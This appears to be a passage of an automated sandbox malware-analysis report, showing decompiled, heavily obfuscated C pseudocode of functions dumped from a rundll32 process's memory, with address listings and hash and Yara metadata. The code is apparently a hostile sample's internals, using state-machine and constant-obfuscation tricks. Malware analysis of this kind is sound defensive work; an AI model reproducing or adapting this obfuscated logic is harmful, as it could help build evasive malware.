				_v1620 = _v1620 ^ 0x20685173;
				_v1628 = 0xb9794c;
				_v1628 = _v1628 >> 0xa;
				_v1628 = _v1628 >> 4;
				_v1628 = _v1628 ^ 0x0003794a;
				while(_t429 != 0x35deb36) {
					if(_t429 == 0x3b58d4d) {
						_push(_v1628);
						_push(_v1620);
						_push(_v1612);
						_push(_t395);
						_push(_t395);
						_push(_v1608);
						_push(_t401);
						_push(_t395);
						E00818B00(_t435, _v1656, __eflags);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					if(_t429 == 0x7ac99d0) {
						_t381 = _t435;
						__eflags =  *_t435 - _t395;
						if(__eflags == 0) {
							L18:
							_t429 = 0xe3616dc;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L17;
							}
							_t428 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t407 =  *_t381 & 0x0000ffff;
								__eflags = _t407;
								if(_t407 == 0) {
									break;
								}
								__eflags = _t407 - 0x20;
								if(_t407 == 0x20) {
									break;
								}
								 *_t428 = _t407;
								_t428 =  &(_t428[0]);
								__eflags = _t428;
							}
							_t401 = 0;
							__eflags = 0;
							 *_t428 = 0;
							L17:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t429 == 0x94e99a1) {
						_push(_t401);
						E0081DE7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588);
						E008306A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
						_push(_v1652);
						_push(_v1696);
						_push(0x100011dc);
						E0081DBCE(E00819F66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
						_t401 = _v1592;
						E0081A203(_t401, _v1664, _v1636, _t385);
						_t436 =  &(_t436[0x17]);
						_t429 = 0x3b58d4d;
						continue;
					}
					if(_t429 == 0xc405385) {
						_t401 = 0x208;
						E00830710(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
						_t436 =  &(_t436[4]);
						_t429 = 0x35deb36;
						continue;
					}
					_t445 = _t429 - 0xe3616dc;
					if(_t429 == 0xe3616dc) {
						_push(_v1716);
						_push(_v1632);
						_push(0x1000115c);
						_t393 = E0082F096(_v1576, _v1640, E00819F66(_v1596, _v1684, _t445), _v1708,  &_v1560);
						asm("sbb edi, edi");
						_t401 = _v1700;
						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
						E0081A203(_t401, _v1604, _v1668, _t391);
						_t436 =  &(_t436[8]);
					}
					L20:
					if(_t429 != 0x74a6920) {
						continue;
					}
					goto L23;
				}
				_t435 = E0082D75A();
				_t429 = 0x7ac99d0;
				goto L20;
			}



























































                                                                                                                      0x008250f9
                                                                                                                      0x008250ff
                                                                                                                      0x00825109
                                                                                                                      0x00825118
                                                                                                                      0x0082511d
                                                                                                                      0x00825123
                                                                                                                      0x0082512b
                                                                                                                      0x0082512d
                                                                                                                      0x00825135
                                                                                                                      0x0082513a
                                                                                                                      0x00825142
                                                                                                                      0x0082514e
                                                                                                                      0x00825153
                                                                                                                      0x00825159
                                                                                                                      0x00825161
                                                                                                                      0x00825169
                                                                                                                      0x00825176
                                                                                                                      0x00825177
                                                                                                                      0x0082517b
                                                                                                                      0x00825183
                                                                                                                      0x0082518b
                                                                                                                      0x00825196
                                                                                                                      0x008251a1
                                                                                                                      0x008251ac
                                                                                                                      0x008251b4
                                                                                                                      0x008251b9
                                                                                                                      0x008251c1
                                                                                                                      0x008251c9
                                                                                                                      0x008251d1
                                                                                                                      0x008251e4
                                                                                                                      0x008251eb
                                                                                                                      0x008251f6
                                                                                                                      0x00825201
                                                                                                                      0x0082520c
                                                                                                                      0x00825217
                                                                                                                      0x0082521f
                                                                                                                      0x0082522d
                                                                                                                      0x00825231
                                                                                                                      0x00825239
                                                                                                                      0x00825241
                                                                                                                      0x00825249
                                                                                                                      0x00825251
                                                                                                                      0x00825259
                                                                                                                      0x00825261
                                                                                                                      0x00825269
                                                                                                                      0x00825271
                                                                                                                      0x00825279
                                                                                                                      0x00825281
                                                                                                                      0x00825289
                                                                                                                      0x00825294
                                                                                                                      0x0082529c
                                                                                                                      0x008252a7
                                                                                                                      0x008252af
                                                                                                                      0x008252b7
                                                                                                                      0x008252bf
                                                                                                                      0x008252c7
                                                                                                                      0x008252cf
                                                                                                                      0x008252d7
                                                                                                                      0x008252dc
                                                                                                                      0x008252e4
                                                                                                                      0x008252ec
                                                                                                                      0x008252f4
                                                                                                                      0x008252f9
                                                                                                                      0x00825303
                                                                                                                      0x00825309
                                                                                                                      0x00825311
                                                                                                                      0x0082531c
                                                                                                                      0x00825327
                                                                                                                      0x00825332
                                                                                                                      0x0082533a
                                                                                                                      0x00825342
                                                                                                                      0x00825347
                                                                                                                      0x0082534f
                                                                                                                      0x00825357
                                                                                                                      0x00825362
                                                                                                                      0x0082536d
                                                                                                                      0x00825378
                                                                                                                      0x00825380
                                                                                                                      0x00825388
                                                                                                                      0x0082538d
                                                                                                                      0x00825395
                                                                                                                      0x008253a0
                                                                                                                      0x008253ab
                                                                                                                      0x008253b6
                                                                                                                      0x008253c1
                                                                                                                      0x008253cc
                                                                                                                      0x008253d7
                                                                                                                      0x008253df
                                                                                                                      0x008253e7
                                                                                                                      0x008253ef
                                                                                                                      0x008253f7
                                                                                                                      0x008253ff
                                                                                                                      0x00825407
                                                                                                                      0x0082540c
                                                                                                                      0x00825411
                                                                                                                      0x00825419
                                                                                                                      0x00825421
                                                                                                                      0x0082542f
                                                                                                                      0x00825434
                                                                                                                      0x0082543f
                                                                                                                      0x00825440
                                                                                                                      0x00825444
                                                                                                                      0x0082544c
                                                                                                                      0x00825459
                                                                                                                      0x00825462
                                                                                                                      0x00825466
                                                                                                                      0x0082546e
                                                                                                                      0x00825476
                                                                                                                      0x0082547e
                                                                                                                      0x00825483
                                                                                                                      0x00825488
                                                                                                                      0x00825490
                                                                                                                      0x00825498
                                                                                                                      0x008254a0
                                                                                                                      0x008254a8
                                                                                                                      0x008254b0
                                                                                                                      0x008254b5
                                                                                                                      0x008254bd
                                                                                                                      0x008254c5
                                                                                                                      0x008254ca
                                                                                                                      0x008254d2
                                                                                                                      0x008254da
                                                                                                                      0x008254e5
                                                                                                                      0x008254f0
                                                                                                                      0x008254fb
                                                                                                                      0x00825509
                                                                                                                      0x0082550d
                                                                                                                      0x00825515
                                                                                                                      0x0082551d
                                                                                                                      0x00825525
                                                                                                                      0x0082552d
                                                                                                                      0x00825535
                                                                                                                      0x0082553a
                                                                                                                      0x00825542
                                                                                                                      0x0082554d
                                                                                                                      0x00825558
                                                                                                                      0x00825563
                                                                                                                      0x0082556b
                                                                                                                      0x00825573
                                                                                                                      0x00825578
                                                                                                                      0x00825580
                                                                                                                      0x00825593
                                                                                                                      0x0082559a
                                                                                                                      0x008255a5
                                                                                                                      0x008255ad
                                                                                                                      0x008255b7
                                                                                                                      0x008255c0
                                                                                                                      0x008255c4
                                                                                                                      0x008255cc
                                                                                                                      0x008255d4
                                                                                                                      0x008255dc
                                                                                                                      0x008255e1
                                                                                                                      0x008255e9
                                                                                                                      0x008255f1
                                                                                                                      0x008255f9
                                                                                                                      0x008255fe
                                                                                                                      0x00825606
                                                                                                                      0x0082560e
                                                                                                                      0x00825619
                                                                                                                      0x00825624
                                                                                                                      0x0082562f
                                                                                                                      0x0082563c
                                                                                                                      0x00825643
                                                                                                                      0x00825647
                                                                                                                      0x0082564c
                                                                                                                      0x00825654
                                                                                                                      0x0082565c
                                                                                                                      0x00825661
                                                                                                                      0x00825666
                                                                                                                      0x0082566e
                                                                                                                      0x00825676
                                                                                                                      0x0082567b
                                                                                                                      0x00825680
                                                                                                                      0x00825688
                                                                                                                      0x0082569a
                                                                                                                      0x0082588d
                                                                                                                      0x00825891
                                                                                                                      0x00825895
                                                                                                                      0x0082589c
                                                                                                                      0x0082589d
                                                                                                                      0x0082589e
                                                                                                                      0x008258a9
                                                                                                                      0x008258aa
                                                                                                                      0x008258ad
                                                                                                                      0x008258b7
                                                                                                                      0x008258b7
                                                                                                                      0x008258bb
                                                                                                                      0x008258c4
                                                                                                                      0x008258c4
                                                                                                                      0x008256a6
                                                                                                                      0x00825827
                                                                                                                      0x00825829
                                                                                                                      0x0082582d
                                                                                                                      0x00825862
                                                                                                                      0x00825862
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082582f
                                                                                                                      0x0082582f
                                                                                                                      0x0082582f
                                                                                                                      0x00825833
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00825835
                                                                                                                      0x0082584a
                                                                                                                      0x0082584a
                                                                                                                      0x0082584d
                                                                                                                      0x00825850
                                                                                                                      0x00825853
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082583e
                                                                                                                      0x00825842
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00825844
                                                                                                                      0x00825847
                                                                                                                      0x00825847
                                                                                                                      0x00825847
                                                                                                                      0x00825855
                                                                                                                      0x00825855
                                                                                                                      0x00825857
                                                                                                                      0x0082585a
                                                                                                                      0x0082585a
                                                                                                                      0x0082585d
                                                                                                                      0x0082585d
                                                                                                                      0x00000000
                                                                                                                      0x0082582f
                                                                                                                      0x008256b2
                                                                                                                      0x00825768
                                                                                                                      0x0082578e
                                                                                                                      0x008257aa
                                                                                                                      0x008257af
                                                                                                                      0x008257b3
                                                                                                                      0x008257bf
                                                                                                                      0x008257fd
                                                                                                                      0x0082580e
                                                                                                                      0x00825815
                                                                                                                      0x0082581a
                                                                                                                      0x0082581d
                                                                                                                      0x00000000
                                                                                                                      0x0082581d
                                                                                                                      0x008256be
                                                                                                                      0x00825742
                                                                                                                      0x00825756
                                                                                                                      0x0082575b
                                                                                                                      0x0082575e
                                                                                                                      0x00000000
                                                                                                                      0x0082575e
                                                                                                                      0x008256c0
                                                                                                                      0x008256c6
                                                                                                                      0x008256cc
                                                                                                                      0x008256d0
                                                                                                                      0x008256df
                                                                                                                      0x00825703
                                                                                                                      0x00825718
                                                                                                                      0x0082571a
                                                                                                                      0x00825724
                                                                                                                      0x0082572a
                                                                                                                      0x0082572f
                                                                                                                      0x0082572f
                                                                                                                      0x0082587f
                                                                                                                      0x00825885
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082588b
                                                                                                                      0x00825878
                                                                                                                      0x0082587a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 0-82791160
                                                                                                                      • Opcode ID: dff6f4005fd6e817e9f1b9ca32be9f3103c0861c073fd5ff970cd93cd86893d3
                                                                                                                      • Instruction ID: 204a7fdac1c1a384de4cafd47124a6cb3f6faf1026ecadc9a50c98ea166b60ce
                                                                                                                      • Opcode Fuzzy Hash: dff6f4005fd6e817e9f1b9ca32be9f3103c0861c073fd5ff970cd93cd86893d3
                                                                                                                      • Instruction Fuzzy Hash: 570223725093809FD3A8CF65C58A64BBBE1FBC5758F10891DF1EA8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00829829 Relevance: 9.1, Strings: 7, Instructions: 389COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00829829(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t471;
				signed int _t488;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t503;
				void* _t552;
				void* _t553;
				signed int _t556;
				signed int* _t558;

				_t558 =  &_v2792;
				_v2604 = _v2604 & 0x00000000;
				_v2616 = 0xa4b63e;
				_v2612 = 0x1047f0;
				_v2608 = 0x380de4;
				_v2640 = 0x3665dd;
				_v2640 = _v2640 >> 1;
				_v2640 = _v2640 ^ 0x001b32c7;
				_v2748 = 0xd91e11;
				_v2748 = _v2748 + 0xffffc541;
				_v2748 = _v2748 ^ 0x51c605c4;
				_v2748 = _v2748 ^ 0x6a8dd901;
				_v2748 = _v2748 ^ 0x3b9e7a9b;
				_v2788 = 0x157b94;
				_v2788 = _v2788 + 0xffffeadc;
				_v2788 = _v2788 >> 0x10;
				_v2788 = _v2788 + 0xffff73d6;
				_v2788 = _v2788 ^ 0xffff2eba;
				_v2716 = 0x64154b;
				_v2716 = _v2716 * 0x75;
				_t552 = __ecx;
				_v2716 = _v2716 << 3;
				_t553 = 0x422d362;
				_v2716 = _v2716 ^ 0x6de46b99;
				_v2720 = 0x9c58cd;
				_v2720 = _v2720 + 0xffff09d2;
				_v2720 = _v2720 + 0x2545;
				_v2720 = _v2720 ^ 0x00913431;
				_v2688 = 0xaeb597;
				_v2688 = _v2688 ^ 0x90c85188;
				_t556 = 0x69;
				_v2688 = _v2688 / _t556;
				_v2688 = _v2688 ^ 0x016f083f;
				_v2624 = 0xf336a7;
				_v2624 = _v2624 ^ 0x0756d720;
				_v2624 = _v2624 ^ 0x07af532c;
				_v2780 = 0x2eb910;
				_v2780 = _v2780 + 0xffff6a34;
				_v2780 = _v2780 + 0x3a3b;
				_v2780 = _v2780 >> 0xc;
				_v2780 = _v2780 ^ 0x00093eda;
				_v2696 = 0x95c01d;
				_v2696 = _v2696 ^ 0xd4af9b47;
				_t488 = 0x43;
				_v2696 = _v2696 * 0x38;
				_v2696 = _v2696 ^ 0x6cc3512a;
				_v2756 = 0x7bda8f;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 + 0xffff790e;
				_v2756 = _v2756 << 1;
				_v2756 = _v2756 ^ 0x00077f92;
				_v2672 = 0xbe500a;
				_v2672 = _v2672 * 0x69;
				_v2672 = _v2672 ^ 0x4e081773;
				_v2664 = 0xf21545;
				_v2664 = _v2664 << 1;
				_v2664 = _v2664 ^ 0x01e0a5ee;
				_v2712 = 0x4aa3d0;
				_v2712 = _v2712 / _t488;
				_v2712 = _v2712 + 0xffffba00;
				_v2712 = _v2712 ^ 0x00096837;
				_v2704 = 0x6e8851;
				_v2704 = _v2704 * 0x4c;
				_v2704 = _v2704 ^ 0x74892048;
				_v2704 = _v2704 ^ 0x54501412;
				_v2740 = 0x9704ff;
				_t491 = 0x4c;
				_v2740 = _v2740 / _t491;
				_v2740 = _v2740 + 0xffff50cb;
				_v2740 = _v2740 / _t556;
				_v2740 = _v2740 ^ 0x0004486b;
				_v2772 = 0xa165e2;
				_t492 = 0x36;
				_v2772 = _v2772 / _t492;
				_v2772 = _v2772 ^ 0x6089554b;
				_t493 = 0x29;
				_v2772 = _v2772 * 0x30;
				_v2772 = _v2772 ^ 0x1a2b5067;
				_v2680 = 0xe9519d;
				_v2680 = _v2680 / _t493;
				_v2680 = _v2680 | 0xd8f73a5a;
				_v2680 = _v2680 ^ 0xd8f0b3ca;
				_v2656 = 0x3fe983;
				_t494 = 0x30;
				_v2656 = _v2656 / _t494;
				_v2656 = _v2656 ^ 0x00046ac2;
				_v2628 = 0x33b4cd;
				_t495 = 0x11;
				_v2628 = _v2628 / _t495;
				_v2628 = _v2628 ^ 0x00043067;
				_v2648 = 0x47920b;
				_t496 = 0x1a;
				_v2648 = _v2648 * 7;
				_v2648 = _v2648 ^ 0x01f55662;
				_v2636 = 0xc27dad;
				_v2636 = _v2636 | 0xeea2905e;
				_v2636 = _v2636 ^ 0xeee70f52;
				_v2792 = 0xce83a7;
				_v2792 = _v2792 | 0x91097b86;
				_v2792 = _v2792 >> 0x10;
				_v2792 = _v2792 + 0xfffff873;
				_v2792 = _v2792 ^ 0x000d88b9;
				_v2764 = 0x687458;
				_v2764 = _v2764 + 0xffff3130;
				_v2764 = _v2764 / _t488;
				_v2764 = _v2764 | 0xf90624cd;
				_v2764 = _v2764 ^ 0xf90653f7;
				_v2784 = 0xf92951;
				_v2784 = _v2784 + 0xffff51be;
				_v2784 = _v2784 ^ 0x8ae9764d;
				_v2784 = _v2784 + 0x99a0;
				_v2784 = _v2784 ^ 0x8a16d001;
				_v2732 = 0xd5993f;
				_v2732 = _v2732 / _t496;
				_v2732 = _v2732 + 0xffff4990;
				_v2732 = _v2732 ^ 0x000978e2;
				_v2724 = 0xcf1521;
				_v2724 = _v2724 >> 2;
				_v2724 = _v2724 << 0xa;
				_v2724 = _v2724 ^ 0xcf1adb57;
				_v2728 = 0xc9d07f;
				_v2728 = _v2728 + 0xffff241f;
				_v2728 = _v2728 + 0xffff5e1a;
				_v2728 = _v2728 ^ 0x00c03f16;
				_v2632 = 0x51b7a0;
				_t497 = 0xd;
				_v2632 = _v2632 / _t497;
				_v2632 = _v2632 ^ 0x0003c006;
				_v2768 = 0xdee1c4;
				_t498 = 0x72;
				_v2768 = _v2768 * 0x4b;
				_v2768 = _v2768 ^ 0x45bd8e4b;
				_v2768 = _v2768 + 0x810;
				_v2768 = _v2768 ^ 0x04f5c4f4;
				_v2620 = 0x673f5;
				_v2620 = _v2620 / _t498;
				_v2620 = _v2620 ^ 0x0006a8dc;
				_v2776 = 0xc1ae10;
				_t499 = 0x5a;
				_v2776 = _v2776 * 0x5d;
				_v2776 = _v2776 / _t499;
				_t500 = 0x7a;
				_v2776 = _v2776 / _t500;
				_v2776 = _v2776 ^ 0x0000f358;
				_v2668 = 0x9bfbd0;
				_v2668 = _v2668 * 0x2e;
				_v2668 = _v2668 ^ 0x1c042184;
				_v2700 = 0xcd0c2b;
				_v2700 = _v2700 >> 8;
				_v2700 = _v2700 + 0xfffff064;
				_v2700 = _v2700 ^ 0x0007642a;
				_v2708 = 0x1a6cb4;
				_v2708 = _v2708 ^ 0x57f593cf;
				_v2708 = _v2708 | 0x44881231;
				_v2708 = _v2708 ^ 0x57eba098;
				_v2752 = 0xd7110a;
				_v2752 = _v2752 / _t556;
				_v2752 = _v2752 << 0xe;
				_v2752 = _v2752 + 0xffff1365;
				_v2752 = _v2752 ^ 0x83185000;
				_v2760 = 0xc45920;
				_v2760 = _v2760 + 0xffffdf34;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xfa48;
				_v2760 = _v2760 ^ 0x00031526;
				_v2652 = 0x3af3c9;
				_v2652 = _v2652 << 0xf;
				_v2652 = _v2652 ^ 0x79efd05d;
				_v2660 = 0x38b4f1;
				_v2660 = _v2660 ^ 0x7076ccd1;
				_v2660 = _v2660 ^ 0x704b934c;
				_v2744 = 0x6269bc;
				_v2744 = _v2744 | 0xfa5eccfb;
				_v2744 = _v2744 * 0x5f;
				_v2744 = _v2744 << 0xe;
				_v2744 = _v2744 ^ 0x9469f4ee;
				_v2676 = 0x941055;
				_v2676 = _v2676 | 0xfd7f72ef;
				_v2676 = _v2676 ^ 0xfdfef17e;
				_v2684 = 0x7199f;
				_v2684 = _v2684 + 0x9aa9;
				_v2684 = _v2684 << 0xe;
				_v2684 = _v2684 ^ 0xed16f6de;
				_v2644 = 0xf4560;
				_v2644 = _v2644 * 0x1c;
				_v2644 = _v2644 ^ 0x01a06f93;
				_v2692 = 0x891e84;
				_v2692 = _v2692 ^ 0x46454346;
				_v2692 = _v2692 | 0x068a2534;
				_v2692 = _v2692 ^ 0x46ca9877;
				_v2736 = 0x29dfc8;
				_t471 = _v2736 * 0x19;
				_v2736 = _t471;
				_v2736 = _v2736 | 0x3d4578d3;
				_v2736 = _v2736 >> 4;
				_v2736 = _v2736 ^ 0x03d45238;
				while(_t553 != 0x2953b22) {
					if(_t553 == 0x422d362) {
						_t553 = 0xe704baa;
						continue;
					} else {
						_t565 = _t553 - 0xe704baa;
						if(_t553 != 0xe704baa) {
							L8:
							__eflags = _t553 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E008306A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
							 *((short*)(E008243A8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
							E00817A50(_v2780,  &_v1560, _t565, _v2696);
							_push(_v2712);
							_push(_v2664);
							_push(0x1000181c);
							E0081DBCE(E00819F66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
							E0081A203(_v2628, _v2648, _v2636, _t483);
							_t500 = _v2792;
							_t471 = E0082B78F(_t500,  &_v2080, _t552, _v2764);
							_t558 =  &(_t558[0x15]);
							if(_t471 != 0) {
								_t553 = 0x2953b22;
								continue;
							}
						}
					}
					return _t471;
				}
				_push(_t500);
				E0081DE7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
				_push(_v2776);
				_push(_v2620);
				_push(0x1000185c);
				E0081DBCE(E00819F66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
				_t503 = _v2652;
				E0081A203(_t503, _v2660, _v2744, _t473);
				__eflags = 0;
				_push(_v2736);
				_push(_v2692);
				_push(_v2644);
				_push(0);
				_push(0);
				_push(_v2684);
				_push(_t503);
				_push(0);
				_t500 =  &_v520;
				_t471 = E00818B00(_t500, _v2676, 0);
				_t558 =  &(_t558[0x1c]);
				_t553 = 0x740d40c;
				goto L8;
			}









































































                                                                                                                      0x00829829
                                                                                                                      0x0082982f
                                                                                                                      0x00829839
                                                                                                                      0x00829844
                                                                                                                      0x0082984f
                                                                                                                      0x0082985a
                                                                                                                      0x00829865
                                                                                                                      0x0082986c
                                                                                                                      0x00829877
                                                                                                                      0x0082987f
                                                                                                                      0x00829887
                                                                                                                      0x0082988f
                                                                                                                      0x00829897
                                                                                                                      0x0082989f
                                                                                                                      0x008298a7
                                                                                                                      0x008298af
                                                                                                                      0x008298b4
                                                                                                                      0x008298bc
                                                                                                                      0x008298c4
                                                                                                                      0x008298d5
                                                                                                                      0x008298d9
                                                                                                                      0x008298db
                                                                                                                      0x008298e0
                                                                                                                      0x008298e5
                                                                                                                      0x008298ed
                                                                                                                      0x008298f5
                                                                                                                      0x008298fd
                                                                                                                      0x00829905
                                                                                                                      0x0082990d
                                                                                                                      0x00829915
                                                                                                                      0x00829923
                                                                                                                      0x00829928
                                                                                                                      0x0082992e
                                                                                                                      0x00829936
                                                                                                                      0x00829941
                                                                                                                      0x0082994c
                                                                                                                      0x00829957
                                                                                                                      0x0082995f
                                                                                                                      0x00829967
                                                                                                                      0x0082996f
                                                                                                                      0x00829974
                                                                                                                      0x0082997c
                                                                                                                      0x00829984
                                                                                                                      0x00829991
                                                                                                                      0x00829992
                                                                                                                      0x00829996
                                                                                                                      0x0082999e
                                                                                                                      0x008299a6
                                                                                                                      0x008299ab
                                                                                                                      0x008299b3
                                                                                                                      0x008299b7
                                                                                                                      0x008299bf
                                                                                                                      0x008299d2
                                                                                                                      0x008299d9
                                                                                                                      0x008299e4
                                                                                                                      0x008299ef
                                                                                                                      0x008299f6
                                                                                                                      0x00829a01
                                                                                                                      0x00829a0f
                                                                                                                      0x00829a13
                                                                                                                      0x00829a1b
                                                                                                                      0x00829a23
                                                                                                                      0x00829a30
                                                                                                                      0x00829a34
                                                                                                                      0x00829a3c
                                                                                                                      0x00829a44
                                                                                                                      0x00829a54
                                                                                                                      0x00829a59
                                                                                                                      0x00829a5d
                                                                                                                      0x00829a6d
                                                                                                                      0x00829a71
                                                                                                                      0x00829a79
                                                                                                                      0x00829a87
                                                                                                                      0x00829a8c
                                                                                                                      0x00829a90
                                                                                                                      0x00829a9f
                                                                                                                      0x00829aa2
                                                                                                                      0x00829aa6
                                                                                                                      0x00829aae
                                                                                                                      0x00829ac4
                                                                                                                      0x00829acb
                                                                                                                      0x00829ad6
                                                                                                                      0x00829ae1
                                                                                                                      0x00829af3
                                                                                                                      0x00829af8
                                                                                                                      0x00829aff
                                                                                                                      0x00829b0a
                                                                                                                      0x00829b1e
                                                                                                                      0x00829b23
                                                                                                                      0x00829b2a
                                                                                                                      0x00829b35
                                                                                                                      0x00829b4a
                                                                                                                      0x00829b4b
                                                                                                                      0x00829b52
                                                                                                                      0x00829b5d
                                                                                                                      0x00829b68
                                                                                                                      0x00829b73
                                                                                                                      0x00829b7e
                                                                                                                      0x00829b86
                                                                                                                      0x00829b8e
                                                                                                                      0x00829b93
                                                                                                                      0x00829b9b
                                                                                                                      0x00829ba3
                                                                                                                      0x00829bab
                                                                                                                      0x00829bbb
                                                                                                                      0x00829bbf
                                                                                                                      0x00829bc7
                                                                                                                      0x00829bcf
                                                                                                                      0x00829bd7
                                                                                                                      0x00829bdf
                                                                                                                      0x00829be7
                                                                                                                      0x00829bef
                                                                                                                      0x00829bf7
                                                                                                                      0x00829c05
                                                                                                                      0x00829c09
                                                                                                                      0x00829c11
                                                                                                                      0x00829c1b
                                                                                                                      0x00829c23
                                                                                                                      0x00829c28
                                                                                                                      0x00829c2d
                                                                                                                      0x00829c35
                                                                                                                      0x00829c3d
                                                                                                                      0x00829c45
                                                                                                                      0x00829c4d
                                                                                                                      0x00829c55
                                                                                                                      0x00829c69
                                                                                                                      0x00829c6e
                                                                                                                      0x00829c75
                                                                                                                      0x00829c80
                                                                                                                      0x00829c8f
                                                                                                                      0x00829c92
                                                                                                                      0x00829c96
                                                                                                                      0x00829c9e
                                                                                                                      0x00829ca6
                                                                                                                      0x00829cae
                                                                                                                      0x00829cc4
                                                                                                                      0x00829ccb
                                                                                                                      0x00829cd6
                                                                                                                      0x00829ce3
                                                                                                                      0x00829ce6
                                                                                                                      0x00829cf2
                                                                                                                      0x00829cfa
                                                                                                                      0x00829cff
                                                                                                                      0x00829d03
                                                                                                                      0x00829d0b
                                                                                                                      0x00829d1e
                                                                                                                      0x00829d25
                                                                                                                      0x00829d30
                                                                                                                      0x00829d38
                                                                                                                      0x00829d3d
                                                                                                                      0x00829d45
                                                                                                                      0x00829d4d
                                                                                                                      0x00829d55
                                                                                                                      0x00829d5d
                                                                                                                      0x00829d65
                                                                                                                      0x00829d6d
                                                                                                                      0x00829d7b
                                                                                                                      0x00829d7f
                                                                                                                      0x00829d84
                                                                                                                      0x00829d8c
                                                                                                                      0x00829d94
                                                                                                                      0x00829d9c
                                                                                                                      0x00829da4
                                                                                                                      0x00829da9
                                                                                                                      0x00829db1
                                                                                                                      0x00829db9
                                                                                                                      0x00829dc4
                                                                                                                      0x00829dcc
                                                                                                                      0x00829dd7
                                                                                                                      0x00829de2
                                                                                                                      0x00829ded
                                                                                                                      0x00829df8
                                                                                                                      0x00829e00
                                                                                                                      0x00829e0d
                                                                                                                      0x00829e16
                                                                                                                      0x00829e20
                                                                                                                      0x00829e28
                                                                                                                      0x00829e33
                                                                                                                      0x00829e3e
                                                                                                                      0x00829e49
                                                                                                                      0x00829e51
                                                                                                                      0x00829e59
                                                                                                                      0x00829e5e
                                                                                                                      0x00829e66
                                                                                                                      0x00829e79
                                                                                                                      0x00829e80
                                                                                                                      0x00829e8b
                                                                                                                      0x00829e93
                                                                                                                      0x00829e9b
                                                                                                                      0x00829ea3
                                                                                                                      0x00829eab
                                                                                                                      0x00829eb3
                                                                                                                      0x00829eb8
                                                                                                                      0x00829ebc
                                                                                                                      0x00829ec4
                                                                                                                      0x00829ec9
                                                                                                                      0x00829ed1
                                                                                                                      0x00829edf
                                                                                                                      0x00829fe3
                                                                                                                      0x00000000
                                                                                                                      0x00829ee5
                                                                                                                      0x00829ee5
                                                                                                                      0x00829ee7
                                                                                                                      0x0082a0bc
                                                                                                                      0x0082a0bc
                                                                                                                      0x0082a0c2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00829eed
                                                                                                                      0x00829f01
                                                                                                                      0x00829f34
                                                                                                                      0x00829f3b
                                                                                                                      0x00829f40
                                                                                                                      0x00829f44
                                                                                                                      0x00829f56
                                                                                                                      0x00829f9c
                                                                                                                      0x00829fb7
                                                                                                                      0x00829fc0
                                                                                                                      0x00829fcc
                                                                                                                      0x00829fd1
                                                                                                                      0x00829fd6
                                                                                                                      0x00829fdc
                                                                                                                      0x00000000
                                                                                                                      0x00829fdc
                                                                                                                      0x00829fd6
                                                                                                                      0x00829ee7
                                                                                                                      0x0082a0d2
